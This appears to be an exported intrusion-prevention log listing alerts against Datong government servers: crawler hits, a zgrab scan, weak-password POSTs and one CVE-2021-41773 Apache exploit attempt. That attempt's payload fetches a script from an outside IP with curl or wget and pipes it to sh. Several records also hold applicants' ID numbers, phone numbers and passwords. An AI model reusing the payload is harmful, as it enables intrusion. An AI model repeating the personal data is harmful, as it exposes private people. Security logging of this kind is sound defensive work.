,{"LogType":"1","ID":"1766","UserID":"1245186","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":22712,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:45:26\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.30\",\"User\":\"111.225.148.30\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" www.dtdj.gov.cn\",\"HttpFirstLine\":\"\/mobile\/article_list.htm?itemId=115&parentId=0\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1310722","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":58106,\"DestPort\":9000,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":37019,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Zgrab工具网络扫描尝试\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:38:55\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"172.169.190.151\",\"User\":\"172.169.190.151\",\"DestIPAddr\":\"121.30.199.77\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.77:9000\",\"HttpFirstLine\":\"\/\",\"Payload\":\" Mozilla\/5.0 zgrab\/0.x\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"RemoteScan\",\"MethodSubNameCN\":\"扫描探测\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1376258","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":45824,\"DestPort\":8180,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":23412,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Web用户弱口令尝试(POST)\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:38:17\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"211.144.139.134\",\"User\":\"211.144.139.134\",\"DestIPAddr\":\"121.30.199.77\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.77:8180\",\"HttpFirstLine\":\"\/api\/base\/api\/accept\/accept\/receive\",\"Payload\":\"{\\\"data\\\":[{\\\"item\\\":{\\\"acceptDate\\\":\\\"2025-02-26 13:40:09\\\",\\\"acceptPersonName\\\":\\\"\\\\e5\\\\bc\\\\a0\\\\e7\\\\a7\\\\80\\\\e7\\\\8e\\\\b2\\\",\\\"applyDate\\\":\\\"2025-02-26 13:40:02\\\",\\\"applyIdNo\\\":\\\"14022620001112794X\\\",\\\"applyIdType\\\":\\\"\\\\e8\\\\ba\\\\ab\\\\e4\\\\bb\\\\bd\\\\e8\\\\af\\\\81\\\",\\\"applyMobile\\\":\\\"15235239806\\\",\\\"applyName\\\":\\\"\\\\e6\\\\9d\\\\8e\\\\e6\\\\85\\\\a7\\\",\\\"charge\\\":1,\\\"finish\\\":1,\\\"finishDate\\\":\\\"2025-02-26 16:40:09\\\",\\\"finishStatus\\\":\\\"\\\\e5\\\\87\\\\86\\\\e4\\\\ba\\\\88\\\\e8\\\\ae\\\\b8\\\\e5\\\\8f\\\\af\\\",\\\"itemCode\\\":\\\"11140213MB196264XP400012301400001\\\",\\\"itemName\\\":\\\"\\\\e6\\\\8a\\\\a4\\\\e5\\\\a3\\\\ab\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e9\\\\a6\\\\96\\\\e6\\\\ac\\\\a1\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\",\\\"limitDays\\\":1,\\\"limitStatus\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"password\\\":\\\"840855\\\",\\\"postAddress\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postName\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postPhone\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"receiveType\\\":\\\"\\\\e7\\\\aa\\\\97\\\\e5\\\\8f\\\\a3\\\\e9\\\\a2\\\\86\\\\e5\\\\8f\\\\96\\\",\\\"serviceObject\\\":\\\"\\\\e8\\\\87\\\\aa\\\\e7\\\\84\\\\b6\\\\e4\\\\ba\\\\ba\\\",\\\"status\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"sym\\\":\\\"14020078000020250226000012\\\",\\\"title\\\":\\\"\\\\e6\\\\8a\\\\a4\\\\e5\\\\a3\\\\ab\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e9\\\\a6\\\\96\\\\e6\\\\ac\\\\a1\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\"},\\\"stepIns\\\":[{\\\"descr\\\":\\\"\\\\e5\\\\90\\\\8c\\\\e6\\\\84\\\\8f\\\",\\\"endDate\\\":\\\"2025-02-26 13:40:16\\\",\\\"limitDays\\\":1,\\\"limitStat\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"WeakPassword\",\"MethodSubNameCN\":\"弱密码\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1441794","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":35918,\"DestPort\":8180,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":23412,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Web用户弱口令尝试(POST)\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:37:01\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"211.144.139.134\",\"User\":\"211.144.139.134\",\"DestIPAddr\":\"121.30.199.77\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.77:8180\",\"HttpFirstLine\":\"\/api\/base\/api\/accept\/accept\/receive\",\"Payload\":\"{\\\"data\\\":[{\\\"item\\\":{\\\"acceptDate\\\":\\\"2025-02-26 13:39:01\\\",\\\"acceptPersonName\\\":\\\"\\\\e4\\\\b9\\\\94\\\\e6\\\\99\\\\93\\\\e8\\\\8a\\\\b1\\\",\\\"applyDate\\\":\\\"2025-02-26 13:38:54\\\",\\\"applyIdNo\\\":\\\"140202621214309\\\",\\\"applyIdType\\\":\\\"\\\\e8\\\\ba\\\\ab\\\\e4\\\\bb\\\\bd\\\\e8\\\\af\\\\81\\\",\\\"applyMobile\\\":\\\"13015391758\\\",\\\"applyName\\\":\\\"\\\\e6\\\\a2\\\\81\\\\e5\\\\bb\\\\ba\\\\e5\\\\b9\\\\b3\\\",\\\"charge\\\":1,\\\"finish\\\":1,\\\"finishDate\\\":\\\"2024-04-29 16:39:01\\\",\\\"finishStatus\\\":\\\"\\\\e5\\\\87\\\\86\\\\e4\\\\ba\\\\88\\\\e8\\\\ae\\\\b8\\\\e5\\\\8f\\\\af\\\",\\\"itemCode\\\":\\\"11140200MB19366520314012300500003\\\",\\\"itemName\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\a4\\\\9a\\\\e6\\\\9c\\\\ba\\\\e6\\\\9e\\\\84\\\\e5\\\\a4\\\\87\\\\e6\\\\a1\\\\88\\\\ef\\\\bc\\\\89\\\",\\\"limitDays\\\":1,\\\"limitStatus\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"password\\\":\\\"306640\\\",\\\"postAddress\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postName\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postPhone\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"receiveType\\\":\\\"\\\\e7\\\\aa\\\\97\\\\e5\\\\8f\\\\a3\\\\e9\\\\a2\\\\86\\\\e5\\\\8f\\\\96\\\",\\\"serviceObject\\\":\\\"\\\\e8\\\\87\\\\aa\\\\e7\\\\84\\\\b6\\\\e4\\\\ba\\\\ba\\\",\\\"status\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"sym\\\":\\\"14020078000020250226000011\\\",\\\"title\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\a4\\\\9a\\\\e6\\\\9c\\\\ba\\\\e6\\\\9e\\\\84\\\\e5\\\\a4\\\\87\\\\e6\\\\a1\\\\88\\\\ef\\\\bc\\\\89\\\"},\\\"\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"WeakPassword\",\"MethodSubNameCN\":\"弱密码\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1507330","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":45680,\"DestPort\":8180,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":23412,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Web用户弱口令尝试(POST)\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:33:25\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"211.144.139.134\",\"User\":\"211.144.139.134\",\"DestIPAddr\":\"121.30.199.77\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.77:8180\",\"HttpFirstLine\":\"\/api\/base\/api\/accept\/accept\/receive\",\"Payload\":\"{\\\"data\\\":[{\\\"item\\\":{\\\"acceptDate\\\":\\\"2025-02-26 15:35:25\\\",\\\"acceptPersonName\\\":\\\"\\\\e5\\\\bc\\\\a0\\\\e7\\\\a7\\\\80\\\\e7\\\\8e\\\\b2\\\",\\\"applyDate\\\":\\\"2025-02-26 15:35:18\\\",\\\"applyIdNo\\\":\\\"140211198603214428\\\",\\\"applyIdType\\\":\\\"\\\\e8\\\\ba\\\\ab\\\\e4\\\\bb\\\\bd\\\\e8\\\\af\\\\81\\\",\\\"applyMobile\\\":\\\"13546072988\\\",\\\"applyName\\\":\\\"\\\\e9\\\\9f\\\\a9\\\\e7\\\\8e\\\\89\\\\e5\\\\a8\\\\9f\\\",\\\"charge\\\":1,\\\"finish\\\":1,\\\"finishDate\\\":\\\"2023-09-11 16:35:25\\\",\\\"finishStatus\\\":\\\"\\\\e5\\\\87\\\\86\\\\e4\\\\ba\\\\88\\\\e8\\\\ae\\\\b8\\\\e5\\\\8f\\\\af\\\",\\\"itemCode\\\":\\\"11140213MB196264XP400012301200003\\\",\\\"itemName\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\a4\\\\9a\\\\e6\\\\9c\\\\ba\\\\e6\\\\9e\\\\84\\\\e5\\\\a4\\\\87\\\\e6\\\\a1\\\\88\\\\ef\\\\bc\\\\89\\\",\\\"limitDays\\\":1,\\\"limitStatus\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"password\\\":\\\"747501\\\",\\\"postAddress\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postName\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postPhone\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"receiveType\\\":\\\"\\\\e7\\\\aa\\\\97\\\\e5\\\\8f\\\\a3\\\\e9\\\\a2\\\\86\\\\e5\\\\8f\\\\96\\\",\\\"serviceObject\\\":\\\"\\\\e8\\\\87\\\\aa\\\\e7\\\\84\\\\b6\\\\e4\\\\ba\\\\ba\\\",\\\"status\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"sym\\\":\\\"14020078000020250226000009\\\",\\\"title\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\a4\\\\9a\\\\e6\\\\9c\\\\ba\\\\e6\\\\9e\\\\84\\\\e5\\\\a4\\\\87\\\\e6\\\\a1\\\\88\\\\ef\\\\bc\\\\89\\\"\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"WeakPassword\",\"MethodSubNameCN\":\"弱密 码\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1572866","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":60256,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:15:34\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.194\",\"User\":\"111.225.148.194\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" www.dtdj.gov.cn\",\"HttpFirstLine\":\"\/mobile\/view\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1638402","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":57098,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:15:33\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.194\",\"User\":\"111.225.148.194\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" www.dtdj.gov.cn\",\"HttpFirstLine\":\"\/mobile\/article_list.htm?itemId=139&parentId=0\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1703938","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":41308,\"DestPort\":80,\"Action\":24,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":44259,\"Severity\":60,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"CVE-2021-41773_Apache_HTTP_Server·径遍历漏洞\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:14:36\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"43.143.211.222\",\"User\":\"43.143.211.222\",\"DestIPAddr\":\"121.30.199.79\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"CVE-2021-41773\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.79:80\",\"HttpFirstLine\":\"\/cgi-bin\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/bin\/sh\",\"Payload\":\"POST \/cgi-bin\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/.%2e\/bin\/sh HTTP\/1.1\\\\0d\\\\0aHost: 121.30.199.79:80\\\\0d\\\\0aAccept: *\/*\\\\0d\\\\0aUpgrade-Insecure-Requests: 1\\\\0d\\\\0aUser-Agent: Custom-AsyncHttpClient\\\\0d\\\\0aConnection: keep-alive\\\\0d\\\\0aContent-Type: text\/plain\\\\0d\\\\0aContent-Length: 105\\\\0d\\\\0a\\\\0d\\\\0aX=$(curl http:\/\/196.251.88.141\/sh || wget http:\/\/196.251.88.141\/sh -O-); echo \\\"$X\\\" | sh -s apache.selfrep\",\"MethodName\":\"Vulnerability\",\"MethodNameCN\":\"漏洞\",\"MethodSubName\":\"DirectoryTraversal\",\"MethodSubNameCN\":\"目录遍历\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1769474","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":53278,\"DestPort\":80,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":51416,\"Severity\":10,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"网络爬虫Bytespider\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:14:00\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"111.225.148.7\",\"User\":\"111.225.148.7\",\"DestIPAddr\":\"121.30.199.82\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" zyx.datong12380.gov.cn\",\"HttpFirstLine\":\"\/robots.txt\",\"Payload\":\" Mozilla\/5.0 (Linux; Android 5.0) AppleWebKit\/537.36 (KHTML, like Gecko) Mobile Safari\/537.36 (compatible; Bytespider; https:\/\/zhanzhang.toutiao.com\/)\\\\0d\\\\0a\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"Spider\",\"MethodSubNameCN\":\"爬虫\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
,{"LogType":"1","ID":"1766","UserID":"1835010","PageNo":"1","CountPerPage":"200","TotalCounts":"28","InputJSON":"{\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\"}","OutputJSON":"{\"SrcPort\":49288,\"DestPort\":8180,\"Action\":20,\"AttackCount\":1,\"SrcVrfIndex\":0,\"ThreatID\":23412,\"Severity\":30,\"HddInfo\":false,\"Application\":\"http\",\"ThreatName\":\"Web用户弱口令尝试(POST)\",\"SrcRegion\":\"\",\"DestRegion\":\"\",\"ThreatType\":\"入侵防御\",\"Time\":\"2025-02-26T16:12:21\",\"ContextName\":\"Admin\",\"Policy\":\"default\",\"Protocol\":\"TCP\",\"SrcIPAddr\":\"211.144.139.134\",\"User\":\"211.144.139.134\",\"DestIPAddr\":\"121.30.199.77\",\"SrcZoneName\":\"Untrust\",\"DestZoneName\":\"Trust\",\"CVE\":\"\",\"MSB\":\"\",\"BID\":\"\",\"RealIP\":\"\",\"CapturePktName\":\"\",\"HttpHost\":\" 121.30.199.77:8180\",\"HttpFirstLine\":\"\/api\/base\/api\/accept\/accept\/receive\",\"Payload\":\"{\\\"data\\\":[{\\\"item\\\":{\\\"acceptDate\\\":\\\"2025-02-26 14:14:21\\\",\\\"acceptPersonName\\\":\\\"\\\\e4\\\\b9\\\\94\\\\e6\\\\99\\\\93\\\\e8\\\\8a\\\\b1\\\",\\\"applyDate\\\":\\\"2025-02-26 14:14:15\\\",\\\"applyIdNo\\\":\\\"140203610502431\\\",\\\"applyIdType\\\":\\\"\\\\e8\\\\ba\\\\ab\\\\e4\\\\bb\\\\bd\\\\e8\\\\af\\\\81\\\",\\\"applyMobile\\\":\\\"13935209411\\\",\\\"applyName\\\":\\\"\\\\e6\\\\88\\\\90\\\\e9\\\\92\\\\a6\\\",\\\"charge\\\":1,\\\"finish\\\":1,\\\"finishDate\\\":\\\"2025-02-26 16:14:21\\\",\\\"finishStatus\\\":\\\"\\\\e5\\\\87\\\\86\\\\e4\\\\ba\\\\88\\\\e8\\\\ae\\\\b8\\\\e5\\\\8f\\\\af\\\",\\\"itemCode\\\":\\\"11140200MB19366520314012300500002\\\",\\\"itemName\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\8f\\\\98\\\\e6\\\\9b\\\\b4\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\89\\\",\\\"limitDays\\\":1,\\\"limitStatus\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"password\\\":\\\"552187\\\",\\\"postAddress\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postName\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"postPhone\\\":\\\"\\\\e6\\\\97\\\\a0\\\",\\\"receiveType\\\":\\\"\\\\e7\\\\aa\\\\97\\\\e5\\\\8f\\\\a3\\\\e9\\\\a2\\\\86\\\\e5\\\\8f\\\\96\\\",\\\"serviceObject\\\":\\\"\\\\e8\\\\87\\\\aa\\\\e7\\\\84\\\\b6\\\\e4\\\\ba\\\\ba\\\",\\\"status\\\":\\\"\\\\e5\\\\b7\\\\b2\\\\e5\\\\8a\\\\9e\\\\e7\\\\bb\\\\93\\\",\\\"sym\\\":\\\"14020078000020250226000008\\\",\\\"title\\\":\\\"\\\\e5\\\\8c\\\\bb\\\\e5\\\\b8\\\\88\\\\e6\\\\89\\\\a7\\\\e4\\\\b8\\\\9a\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\88\\\\e5\\\\8f\\\\98\\\\e6\\\\9b\\\\b4\\\\e6\\\\b3\\\\a8\\\\e5\\\\86\\\\8c\\\\ef\\\\bc\\\\89\\\"},\\\"stepIns\\\":[{\\\"descr\\\":\\\"\\\\e5\\\\90\",\"MethodName\":\"InformationDisclosure\",\"MethodNameCN\":\"信息收集类攻击\",\"MethodSubName\":\"WeakPassword\",\"MethodSubNameCN\":\"弱密码\",\"LoginUserName\":\"\",\"LoginPassword\":\"\"}","TimeFilter":{"StartTime":"2025-02-26T16:00:00","EndTime":"2025-02-26T23:59:59"}}
]
}
}
Reference in New Issue View Git Blame Copy Permalink